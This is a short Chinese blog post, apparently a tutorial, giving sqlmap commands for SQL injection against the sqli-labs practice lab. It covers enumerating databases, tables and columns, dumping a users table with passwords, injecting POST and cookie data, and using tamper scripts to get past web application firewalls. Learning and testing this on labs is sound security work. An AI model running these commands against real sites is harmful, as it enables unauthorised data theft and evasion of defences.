sqlmap使用总结

sqlmap是全面的注入工具


最简单形式


#Get 
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --batch
#爆数据库
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --dbs
#爆表名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security --tables
#爆列名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users --columns
#dump数据
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users -C id,username,password --dump

post,cookies


python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" --cookie="XIc6_2132_saltkey=g5N5rRBz; SESS2a7db910cd5249ca3016afc519d2d9bf=OFwfZCCwgO8XF5bYygJsUNy__-kwXuDVk2birG42BVA" --batch

从文件中读取


最好用,(可以burpsuite抓包,保存到文件中如:in.txt)

python27 sqlmap.py -r in.txt --batch

指定参数


指定存在漏洞的参数,适合猜测或者手动分析过

python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" -p passwd --batch

指定注入的方式


适合手动测试过,特别是sqlmap会优先用time-based而不是union select

python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --technique U --batch --dbs
#B, E, Q, S, T, U

指定注入位置


“ * “号指定注入的指定位置
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1*+--+" --batch

tamper绕过waf


tamper绕过waf,可以尝试使用不同的tamper来绕过waf,保存在tamper目录下

python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --tamper=space2comment --batch

其他参数


可以直接sqlmap -h 或者 sqlmap -hh查看下,有需要可以尝试下

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,104评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,430评论 2 22
  • sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功...
    道书简阅读 1,443评论 0 0
  • SQLMAP作用 判断可注入的参数 判断可以用哪种SQL注入技术来注入 识别出哪种数据库 根据用户选择,读取哪些数...
    陆洒脱阅读 3,741评论 1 4
  • sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    linkally阅读 6,951评论 1 40